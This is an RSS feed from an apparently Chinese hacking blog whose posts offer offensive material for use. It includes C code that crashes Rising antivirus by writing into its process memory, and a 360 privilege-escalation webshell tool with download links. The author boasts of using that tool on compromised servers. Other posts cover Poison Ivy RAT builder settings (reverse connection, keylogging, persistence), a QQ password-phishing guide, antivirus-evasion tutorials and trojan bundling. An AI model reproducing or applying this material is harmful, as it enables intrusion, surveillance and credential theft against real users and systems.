<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>叶子's blog - 发布教程/Materials</title><link>http://yezishell.cn/</link><description>叶子的博客|关注网络安全！关注网络技术！关注SEO优化！ - </description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>CopyRight 2009 叶子's blog　  鲁ICP备09016725号　　</copyright><pubDate>Thu, 09 Sep 2010 12:58:01 +0800</pubDate><item><title>瑞星2010年组合版最新漏洞(附演示动画)</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/materials/358/</link><pubDate>Wed, 03 Mar 2010 16:39:44 +0800</pubDate><guid>http://yezishell.cn/materials/358/</guid><description><![CDATA[<p>测试代码：<br />复制代码<br />DWORD GetProcessIdFromName(LPCTSTR name)<br />{<br />PROCESSENTRY32 pe;<br />DWORD id = 0;</p><p>HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);</p><p>pe.dwSize = sizeof(PROCESSENTRY32);<br />if( !Process32First(hSnapshot,&amp;pe) )<br />return 0;</p><p>do<br />{<br />pe.dwSize = sizeof(PROCESSENTRY32);<br />if( Process32Next(hSnapshot,&amp;pe)==FALSE )<br />&nbsp;&nbsp; break;<br />if(strcmp(pe.szExeFile,name) == 0)<br />{<br />&nbsp;&nbsp; id = pe.th32ProcessID;<br />&nbsp;&nbsp; break;<br />}</p><p>} while(1);</p><p>CloseHandle(hSnapshot);</p><p>return id;<br />}</p><p><br />&nbsp;</p><p>DWORD GetProcessID(char *FileName)<br />{<br />HANDLE myhProcess;<br />PROCESSENTRY32 mype;<br />BOOL mybRet;<br />//进行进程快照</p><p>myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //TH32CS_SNAPPROCESS快照所有进程<br />//开始进程查找<br />mybRet=Process32First(myhProcess,&amp;mype);<br />//循环比较，得出ProcessID<br />while(mybRet)<br />{<br />if(strcmp(FileName,mype.szExeFile)==0)<br />return mype.th32ProcessID;<br />else<br />mybRet=Process32Next(myhProcess,&amp;mype);<br />}<br />return 0;<br />}</p><p><br />void killProcess(CString www ,LPCTSTR name,char *xyz)<br />{</p><p><br />&nbsp;&nbsp; DWORD&nbsp;&nbsp;&nbsp; nPid = 0;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; HANDLE&nbsp;&nbsp;&nbsp;&nbsp; hProcess;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; DWORD&nbsp;&nbsp;&nbsp; nExitCode = 0;<br />&nbsp;&nbsp;&nbsp; DWORD&nbsp;&nbsp;&nbsp; nAddress = 0x1000;<br />&nbsp;&nbsp;&nbsp; nPid=GetProcessIdFromName(name);<br />&nbsp;&nbsp;&nbsp; hProcess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, 0,nPid);<br />&nbsp;&nbsp;&nbsp; WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&amp;nPid,1,NULL);&nbsp;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; while ( nAddress &lt;= 0x7FFFF000 )<br />&nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; GetExitCodeProcess(hProcess, &amp;nExitCode);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (nExitCode != STILL_ACTIVE)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&amp;nPid,1,NULL); <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; nAddress += 0x1000;<br />&nbsp;&nbsp;&nbsp; }</p><p><font face="宋体" size="3"> </font></p><p>漏洞简介：向瑞星内存地址不断写入代码使其出错退出(演示动画)</p><p>killrising.rar (4824 K)<br /><u><font color="#810081"><a href="http://www.51chi.net/qing/killrising.rar">http://www.51chi.net/qing/killrising.rar</a></font></u></p><p>解压密码：qing520</p>]]></description><category>发布教程/Materials</category><comments>http://yezishell.cn/materials/358/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=358</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=358&amp;key=552fa303</trackback:ping></item><item><title>360安全卫士本地提权漏洞的webshell利用程序</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/materials/372/</link><pubDate>Sat, 20 Feb 2010 23:48:37 +0800</pubDate><guid>http://yezishell.cn/materials/372/</guid><description><![CDATA[<p>不知道该说什么好了，以前拿了很多shell，一直懒得提权，一是没那个必要，二是提权太累了，三是服务器类型的肉鸡多了也没啥用。不过要是能让我一下子就成功提权，何乐而不为呢？</p><p>于是360本地提权来了，最近已经沸沸扬扬的了，不多发表过多评论，只是觉得做公司更要厚道；本人菜另外还有很多兄弟在360，不说什么了，发了本地提权的利用程序吧。friddy那里已经有一份了，是用来替换5下shift为cmd.exe的：360本地提权webshell下测试程序。</p><p>瑞星说是&ldquo;bregdrv.sys和bregdll.dll&rdquo;出的问题，然后http://www.sebug.net/exploit/19048/这个poc也是直接load这个dll的，于是这个利用程序也是基于这个的。webshell下使用，guest权限即可，需要Wscript.shell支持，功能主要是：</p><p>1.开启终端服务，端口为3389；用法：360.exe port</p><p>2.替换5下shift为cmd；用法：360.exe sethc</p><p>另外大家可以参考下包子的文章：360 0day漏洞及相关内幕，360很多dll存在类似的调用问题。据360的公告介绍已经打补丁了，具体是真是假，大家自己试试这个工具还能不能用吧。</p><p>这个工具不针对任何公司和个人，仅限爱好渗透的同学们进行交流。话说昨天从下午到晚上，我2、3年来拿到的仍然健在的shell的满足3389打开与安装了360安全卫士的服务器我都提了一下权，发现360在服务器的普及率也高的惊人，至少有80%，怪不得大家都提权提的爽死了，于是乎，很多肉鸡终于找到家了。</p><p>现在终于知道服务器类型的肉鸡的好处了，一是用来上线；二是用来摆放垃圾未备案域名；三是用来跑密码...看来之前轻视了。</p><blockquote><p>题外话：</p><p>上周六晚，sec@nanjing的孩子们又聚了一次，这次还有嘉宾：flashsky前辈，于是，吃饭的同时，使劲的瞻仰与膜拜诸位大牛，但愿有朝一日能跟他们一样牛：）</p><p>如果blog被和谐，则去国外买主机；关闭oldblog，以后忽略asp走php路线了。</p></blockquote><p>演示：</p><p><img alt="360" src="http://www.oldjun.com/blog/index.php/res/59/360.gif" /></p><p>(注：本图片只限学习，拒绝按此方法进行破坏或者瑞星公司拿此图片作为炒作)</p><p>下载：http://www.oldjun.com/download/360.exe</p>]]></description><category>发布教程/Materials</category><comments>http://yezishell.cn/materials/372/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=372</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=372&amp;key=b9946adb</trackback:ping></item><item><title>Poison IVY 使用</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/materials/311/</link><pubDate>Wed, 25 Nov 2009 08:10:53 +0800</pubDate><guid>http://yezishell.cn/materials/311/</guid><description><![CDATA[<div class="ContentFont" id="NewaspContentLabel" style="padding-right: 10px; display: block; padding-left: 10px; padding-bottom: 0px; padding-top: 0px"><font id="font_word" style="font-size: 14px; font-family: 宋体, Verdana, Arial, Helvetica, sans-serif">现在，博客、社交网站、微博客等WEB2.0的应用，正在改变人们的生活和工作习惯，但与此同时却给企业带来了更多的安全风险。例如，员工可能将企业机密信息，通过手机发布到微博客中，或发送到自己的电子邮箱中;另外，员工在编写博客的过程中，可能将一些与自身工作相关的内容记录下来，但是他自己却认为这些信息并不属于机密，比如在博客中描写企业安装了什么新防火墙，以及防火墙部署在什么位置，主要用来保护哪些服务器或网段等信息。所有的这些，都会给企业带来严重的安全风险。<p>　　因此，为了减少WEB2.0应用带来的安全风险，企业可能需要知道某些关键终端或服务器上运行了什么服务，发送了什么信息和文件，以及使用者上班时间到底在做些什么等方面。另外，如果监测到某台终端正在发送危害企业数据安全的行为，为了得到证据，有时还需要完成抓取危险主机的屏幕状态，录制录像和声音等任务。</p><p>　　而要完成这样的工作，人们通常想到就是用商业的安全管理软件或硬件来应对，但是，像屏幕和声音录制等任务却不容易实现。其实，除了这种常规的途径外，还可以使用特洛伊木马达到同样的目的。</p><p>　　例如，Poison IVY就是WINDOWS系统下一个高级远程管理工具。它采用c/s结构，其客户端可以运行在Windows、linux或UNIX系统上，其服务端的内容依靠我们的设置来决定，不过只能运行在Widnows2000/XP/2003/Vista系统上。</p><p>　　Poison IVY的服务端可以非常小，不过，如果需要添加所有的插件，其大小会增长很多，但即使是这样，它的服务端在压缩状态下最大不超过7KB的大小。</p><p>　　<b>虽然Poison IVY非常小，但是，它却具有下列所示的主要特性：</b></p><p>　　(1)256位加密连接，可以减少远程管理过程中泄密的风险。</p><p>　　(2)完整的文件管理功能。</p><p>　　(3)远程注册表管理功能。</p><p>　　(4)键盘记录功能。</p><p>　　(5)服务管理功能。</p><p>　　(6)进程管理功能。</p><p>　　(7)远程视频和音频捕捉。</p><p>　　(8)WEB摄像头捕捉。</p><p>　　(9)密码管理</p><p>　　(10)共享服务。</p><p>　　(11)第三方插件支持。</p><p>　　这些功能还只是Poison IVY所有功能中一部分。在上述这些功能中，像键盘记录功能和WEB摄像头捕捉等功能，通常是人们最担心的。主要是在使用木马为自己工作时，担心这些功能会对被控端带来同样的危害。</p><p>　　不过，这种担心是应该的，也是很有必要的。在使用木马为自己工作之前，我们一定要弄清楚它们本身具有的安全性，例如，它们的各种功能是不是可以自由控制，是否可以设置控制的用户及设置密码等。而这些功能，Poison IVY恰巧都具有。</p><p>　　其实，具有这样功能的木马还有许多。除Poison IVY之外，还有Back Orifice XP、CIA</p><p>　　、Nuclear RAT等木马都具有与它相似的功能，或者其它更多的特色功能，例如穿透防火墙或可加密加壳等。</p><p>　　上述这些木马程序，在雪源梅香下载和试用时，都没有被检测到发现木马程序。只是在下载Poison IVY的WI-FI插件时，被迅雷检测到含有木马。但是，由于Poison IVY的这个插件同样是安全的，你完全不要理会这种警报，继续下载就可以。</p><p>　　更加难能可贵的是Poison IVY的开发者一直在提供技术和升级服务，而且，开发者的本意，也是将这款软件作为一款优秀远程管理软件在进行开发和推广的。</p><p>　　实际上，有许多被人们称为木马的软件，其开发者本意都是好的。只是恰巧这些软件具有许多特殊的功能，而这些功能又恰巧可以帮助攻击者实施攻击活动，由此，当这些工具软件被攻击者用来进行攻击活动后，就像变了一幅面孔一样，从自走向&ldquo;犯罪&rdquo;生涯了。</p><p>　　就像上面所提到的这些被称为木马的软件，如果将它们用在企业的网络监控和管理上，那么，它们同样能够重新&ldquo;变节&rdquo;而成为我们真实的好工具，来为我们完成网络管理过程中一些特殊的任务。由于上面所示的木马程序，它们的功能大致相同，其使用方式也同样相似。因此，下面，雪源梅香只以Poison IVY为例，详细说明怎么去安全使用它们来为我们进行网络管理工作。</p><p>　<b>　1、 安装和运行</b></p><p>　　上述的木马程序，大多免去了安装，在下载回来后，只需将压缩包解压后就可以直接使用它们。对于Poison IVY，我们可以去upload/200911250812080683.jpg" onload="return imgzoom(this,550)" /></p><p align="center">　　图1 Poison IVY运行后的主界面</p><p>　　至于本文其它几个木马的下载地址，Back Orifice XP可以从upload/200911250812106557.jpg" width="407" onload="return imgzoom(this,550)" /></p><p align="center">　　图2 poison ivy生成服务端界面</p><p>　　(2) 在图2所示界面中，单击&ldquo;create profile&rdquo;按钮，在打开的对话框中输入一个名称。此时，左边项目栏中的原本灰色的按钮将被激活，接下来，按其排列顺序完成服务端的其它配置。</p><p>　　(3) 单击图2所示界面中的&ldquo;connection&rdquo;按钮，将出现如图3所示的设置连接信息的界面。</p><p align="center">　　<img height="233" alt="" src="http://yezishell.cn/upload/200911250812113452.jpg" width="407" onload="return imgzoom(this,550)" /></p><p align="center">　　图3 设置连接信息界面</p><p>　　poison ivy是一个具有反向连接的木马程序，因此，我们必需在图3所示界面中的DNS/PORT文本框中，输入正确的客户端IP地址和监听服务器端的端口，然后单击&ldquo;Add&rdquo;按钮添加设置。</p><p>　　为了poison ivy的服务器端只有我们自己能够进行控制和连接，还必需在图3所示界面中的ID文本框中输入建立的用户名，在&ldquo;GROUP&rdquo;中输入组名(可选)，然后在&ldquo;Password&rdquo;文本框中输入连接密码。在这里，还可以选择&ldquo;Hide Password&rdquo;多项选择框，隐藏密码框中显示的内容，密码也以由软件自己随机产生。　(4) 可以通过单击图3所示界面右下角的&ldquo;NEXT&rdquo;按钮，进入&ldquo;Install&rdquo;配置项，也可以直接单击&ldquo;Install&rdquo;按钮进入其配置界面。如图4所示。</p><p align="center">　　<img height="240" alt="" src="http://yezishell.cn/upload/200911250812111262.jpg" width="407" onload="return imgzoom(this,550)" /></p><p align="center">　　图4 Install配置界面</p><p>　　在Install配置界面，可以指定文件名、安装到系统中的什么位置，以及通过选择&ldquo;key logger&rdquo;多项选择框来决定是否记录键盘输入，或通过选择&ldquo;persistence&rdquo;来确保当poison ivy服务端进程被停止后，重新启动服务端进程，并防止服务端程序本身被删除。</p><p>　　poison ivy的这些特性与其它恶性木马是相同的，在我们使用它的过程中，如果没有特殊要求，例如不想被被监控者看到，就可以使用这些功能，但是，通常情况下，这些功能是可选的。</p><p>　　(5) 完成Install配置项的配置后，单击&ldquo;Advanced&rdquo;就可以打开如图5所示的高级配置界面。</p><p align="center">　　<img height="241" alt="" src="http://yezishell.cn/upload/200911250812115604.jpg" width="407" onload="return imgzoom(this,550)" /></p><p align="center">　　图5 高级配置界面</p><p>　　在高级配置界面，主要完成进程注入和注入格式的设置。同样，这些功能都是可选的，如果没有什么特殊的要求，可以在此保持默认设置。</p><p>　　现在，poison ivy服务端的配置全部完成，只要再单击&ldquo;Build&rdquo;按钮，就可以按照上述的配置生成我们想要的客户端。</p><p>　　完成poison ivy服务端的生成工作后，我们还必需为些服务端生成一个新的客户端，主要用来与些服务端配套使用，监听从服务端反向回来的连接。与此同时，为了确保poison ivy客户端能够监听到服务端的反向连接信息，必需确保防火墙开放了客户端监听的端口。</p><p>　　要生成poison ivy的客户端，可以通过在其主界面中，选择&ldquo;File&rdquo;&mdash;&mdash;&ldquo;New Client&rdquo;菜单，打开如图6所示的生成客户端界面。</p><p align="center">　　<img height="203" alt="" src="http://yezishell.cn/upload/200911250812117382.jpg" width="339" onload="return imgzoom(this,550)" /></p><p align="center">　　图6 poison ivy生成客户端界面</p><p>　　在生成客户端界面的&ldquo;Listen on Port&rdquo;下拉框中选择建立服务端时设置的端口号，在&ldquo;Password&rdquo;文本框中输入建立服务端时设置的密码，或直接导入软件产生的&ldquo;KEY&rdquo;文件，然后单击&ldquo;Start&rdquo;按钮就可以开始新的监听服务。</p><p>　　当然，要想poison ivy的客户端能够监听到来自与此匹配服务端的连接信息，首长必需确保服务端已经在被监控和管理的系统上运行了。而完成这些工作，可以由我们直接安装，或者通过木马常用的手段进行安装，安装方式可以由你自由选择。至于poison ivy其它更多的功能，还是留给你自己慢慢去发现吧!</p><p>　　通过我们的简单配置，一个完全可控的远程监控和管理的木马工具，就可以开始为我们完成各种特殊的任务了。从上述的配置过程中也可以发现，这些木马程序都具有很高的隐蔽性和自我保护的特性。有时，为了防止服务端被删除，这些特性是必需的，而一些商业的远程监控和管理软件有时却没有这些功能。由此可以看去，使用木马来进行远程监控和管理，还真是一种不错的选择。不如，你也试试。</p></font></div>]]></description><category>发布教程/Materials</category><comments>http://yezishell.cn/materials/311/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=311</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=311&amp;key=accfc892</trackback:ping></item><item><title>想当黑客很容易 日付200美元僵尸网络听使唤</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/materials/220/</link><pubDate>Tue, 18 Aug 2009 23:44:55 +0800</pubDate><guid>http://yezishell.cn/materials/220/</guid><description><![CDATA[<div style="padding-bottom: 0px; padding-left: 10px; padding-right: 10px; display: block; padding-top: 0px" id="NewaspContentLabel" class="ContentFont"><font style="font-family: 宋体, Verdana, Arial, Helvetica, sans-serif; font-size: 14px" id="font_word">8月17日消息，如果是几年前，8月初发生的Twitter的网络攻击事件难度很高，黑客需要是个计算机狂，能够同时操控数千台计算机;不然就要很有钱，支付白花花的银子让专家来做这件事。<p>　　那么现在呢?</p><p>　　据《BusinessWeek》报道，现在网络攻击变得相当简单，那些攻击如Twitter网站的工具已经变得便宜且易于使用，让更多人可以制造网络灾难。</p><p>　　网络信息安全公司Damballa副总Gunter Ollman表示：&ldquo;门槛的降低，使得几乎所有人都可以进行网络攻击。&rdquo;</p><p>　　以Twitter的状况来说，黑客尝试利用分布式阻断攻击的手法，联合数百台计算机同时联机瘫痪主机，让一位博客噤声。而连带的影响就是，整个Twitter的网站都受牵连而用户无法登入，其它社交网站如Facebook及Live Journal，其联机速度也被拖慢。</p><p>　　思科系统首席信息安全研究员Patrick Peterson表示，这次的攻击事件，就像拿手榴弹攻击蚊子。</p><p>　　而该攻击事件，也可能是下列情形的征兆：犯罪集团与黑客用计算机病毒感染了成千上万的计算机，将它们成为所谓的僵尸计算机网络，用以发动攻击或散布垃圾信件。然后，犯罪集团就能将这样的僵尸网络出租给有心人，让网络攻击变得像上亚马逊网站买书一样容易，也不需要破解密码或是软件编码。</p><p>　　信息安全专家表示，僵尸网络的爆炸性成长，使得地下供货商们面临削价竞争的压力。Ollman指出，以往大概大概只有半打僵尸网络，受挟持的计算机约百万台，但现在僵尸网络成倍数成长，使得租借1万台计算机(一个足以瘫痪Twitter的量)的价格，从每天2000-5000美元，降到只剩200美元。</p><p>　　Ollman表示，没有看过如此夸张的价格下滑趋势。</p><p>　　这也造成了网络攻击事件的上升，8月10日时，约有1300个分布式阻断攻击，但两年前时的同一天，只有约700个。</p><p>　　攻击者的动机千百种，有些是因为政治因素，如这次的Twitter攻击事件，就是要平息对俄国政府的批评。有的是为了要掩饰诈欺，如避免遭窃的银行账户被发现。此外，愤怒的职员也可以瘫痪自家公司网站、商家也可以瘫痪竞争对手的网页。</p><p>　　网络攻击要完成，大概只需要1小时。只要在Google以&ldquo;僵尸网络&rdquo;做关键词搜索，就可以找到许多论坛。然后下载包括控制台的软件后，选定攻击目标及攻击时间，再透过西联汇款，就大功告成。</p><p>　　瞧，是不是变得跟上拍卖网站一样轻松愉快?</p><p>　　面对大举来袭的网络攻击，企业增加其计算机网络的承载力，不过信息安全专家认为，在僵尸网络军火日益精良的当下，必须要用更具创意的方法来防范。</p><p>　　Peterson说：&ldquo;你必须尝试用罪犯的思维来思考。&rdquo;</p></font></div>]]></description><category>发布教程/Materials</category><comments>http://yezishell.cn/materials/220/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=220</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=220&amp;key=df355d08</trackback:ping></item><item><title>灰鸽子上线教程</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/materials/169/</link><pubDate>Fri, 19 Jun 2009 12:47:26 +0800</pubDate><guid>http://yezishell.cn/materials/169/</guid><description><![CDATA[<p><embed src="http://www.huigezi.net/flash/vip2007.swf" width="400" height="300" play="true" loop="true" type="application/x-shockwave-flash" menu="true"></embed></p><p>灰鸽子[VIP 2007] 功能演示动画&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; <a target="_blank" href="http://www.huigezi.net/flash/vip2007.swf ">点击放大</a></p><p>&nbsp;经典的 远控软件.&nbsp;&nbsp;回顾一下吧,&nbsp;&nbsp; 鸽子上线.</p><p><a target="_blank" href="http://download.77169.com/donghua/hacker/200810/20081013hgzsxjc.zip">点击下载</a></p><p>&nbsp;</p>]]></description><category>发布教程/Materials</category><comments>http://yezishell.cn/materials/169/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=169</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=169&amp;key=9f229199</trackback:ping></item><item><title>用瞒天过江来盗QQ2009</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/materials/168/</link><pubDate>Fri, 19 Jun 2009 12:35:19 +0800</pubDate><guid>http://yezishell.cn/materials/168/</guid><description><![CDATA[<div class="down_content_text"><p>　<a target="_blank" href="http://www.hackbase.com/uploadfile/soft/uploadfile/200812/20081222031635208.jpg"><img height="280" alt="" width="400" src="http://www.hackbase.com/uploadfile/soft/uploadfile/200812/20081222031635208.jpg" /></a></p><p>　这个教程是盗2008和2009的。<br />　　步骤很简单首先是盗2009的，做了一个简单的版本，程序不会破坏电脑，不会自动运行，删除就OK了。。<br />　　首先打开瞒天过江（&ldquo;海&rdquo;功能大，&ldquo;江&rdquo;功能小），就是做一个假的界面上别人以为是真的。<br />　　把一个QQ.asp 上传到你的网站上去。<br />　　输入网站，选择路径点植入就OK了。<br />　　就会生成这个文件。QO.exe<br />　　加多一点复杂的步骤，就是改桌面上的快捷路径名。<br />　　好，我们来测试一下看OK不可以。</p></div><p><a target="_blank" href="http://wt.honkbase.com/dh/2008/12/23/14.rar">点击下载</a></p><p>&nbsp;</p>]]></description><category>发布教程/Materials</category><comments>http://yezishell.cn/materials/168/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=168</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=168&amp;key=3c42a5f1</trackback:ping></item><item><title>(原创)免杀之重建输入表</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/materials/118/</link><pubDate>Fri, 10 Apr 2009 22:41:30 +0800</pubDate><guid>http://yezishell.cn/materials/118/</guid><description><![CDATA[<p>大家看我操作就好了.. 做免杀的时候 开始 最好先 pe头移动一下在重建表 这样 特征码就是少了一些</p><p>方便一后的免杀. 这个是 原来做的</p><p>&nbsp;</p><p>教材地址：<a href="http://www.anqn.com/ke/demo/miansha/2009-03-06/a09107706.shtml">http://www.anqn.com/ke/demo/miansha/2009-03-06/a09107706.shtml</a></p><p>&nbsp;</p><p>已被安全中国 收录。。 大家请到那里下载看。。</p>]]></description><category>发布教程/Materials</category><comments>http://yezishell.cn/materials/118/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=118</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=118&amp;key=c281a1ae</trackback:ping></item><item><title>[原创]免杀之pe头移动</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/materials/3/</link><pubDate>Fri, 02 Jan 2009 03:46:33 +0800</pubDate><guid>http://yezishell.cn/materials/3/</guid><description><![CDATA[<p><br />大家好 今天给大家做的&nbsp; 动画是 免杀之pe头移动&nbsp;</p><p><br />网上这类文章不少但是 动画缺 少 今天实例给大家演示下 pe头的移动</p><p>&nbsp;看操作 先打开鸽子</p><p>我用的&nbsp; 黑防 2005&nbsp;</p><p>看看上线吗</p><p><br />今天给大家说原理 所以就不开杀软了&nbsp; 大家明白原理 一通百通的</p><p><br />上线正常&nbsp; 下面我们来移动pe头 看操作</p><p><br />用c32打开</p><p>0010000 就是记录 pe头位置 的&nbsp; 因为内存是反着看的 所以就是 0000100</p><p>pe 头&nbsp;&nbsp;&nbsp;&nbsp; pe头里这个?是记录&nbsp; pe头大小的&nbsp; 现在是 E0</p><p>我们看看 16进制e0 是多少</p><p>E0=224&nbsp;&nbsp; 也就是224个字节&nbsp;</p><p><br />也就是到这&nbsp; c32下有提示&nbsp; 224字节 我们向上移动一个</p><p>好了 移动了 那么 pe头到尾部的大小一会变 我们看看现在的大小</p><p>是 240个字节 我们再转成16进制看看是多少</p><p><br />240=f0</p><p>我们把 原来的pe头大小改改</p><p><br />这样就对了&nbsp; 现在 pe头的位置是 0000f0 再把地址改上 看看成功嘛?</p><p><br />上线正常 大家要注意好&nbsp; 内存地址是反写的 就好了&nbsp;</p><p>教程下载地址:</p><p><a target="_blank" href="http://www.anqn.com/ke/demo/miansha/2009-01-19/a09105787.shtml">www.anqn.com/ke/demo/miansha/2009-01-19/a09105787.shtml</a></p>]]></description><category>发布教程/Materials</category><comments>http://yezishell.cn/materials/3/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=3</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=3&amp;key=0e4ff71b</trackback:ping></item><item><title>[原创]rar再次捆绑木马</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/materials/4/</link><pubDate>Thu, 01 Jan 2009 03:49:52 +0800</pubDate><guid>http://yezishell.cn/materials/4/</guid><description><![CDATA[<p>大家好 我是叶子,.. qq:285363807 <br />今天给大家带的教程是 rar再次捆绑木马,,&nbsp; 希望黑鹰能给我个邀请码&nbsp; 刚才做了一边望了 壁纸 了,&nbsp;&nbsp; <br />&nbsp;<br />&nbsp;<br />&nbsp; 好了&nbsp;&nbsp; 大家都知道 原来的&nbsp; rar3.6 可以用自解压的 方式叫2个软件一起运行, <br />&nbsp;&nbsp;&nbsp; 但是 现在的 3.7 却 补上了 那个漏洞,, 不能捆绑木马了,, <br />&nbsp;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 今天给大家带了一个 思路 就是利用&nbsp; cmd 执行 exe 大家看我操作吧,,&nbsp; 我就拿正常的软件来演示了, 假设1.exe是木马 2.exe是 正常的软件,看&nbsp;&nbsp; 好了 再把这3个东西 压缩起来.&nbsp; 解压后&nbsp; 运行 3.bat&nbsp;&nbsp;&nbsp; 好了&nbsp; 是不是 都运行了,&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 我从新弄一个,, <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 第一次做教程 有点紧张 大家多包含,&nbsp; 希望黑鹰给我个邀请吗&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;教程的那个Qq不用了.. 用 250048111</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 大家 拜拜,,</p><p>教程下载地址:</p><p><a target="_blank" href="http://www.3800hk.com/donghua/g/21758.html">www.3800hk.com/donghua/g/21758.html</a></p>]]></description><category>发布教程/Materials</category><comments>http://yezishell.cn/materials/4/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=4</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=4&amp;key=80abfd90</trackback:ping></item></channel></rss>
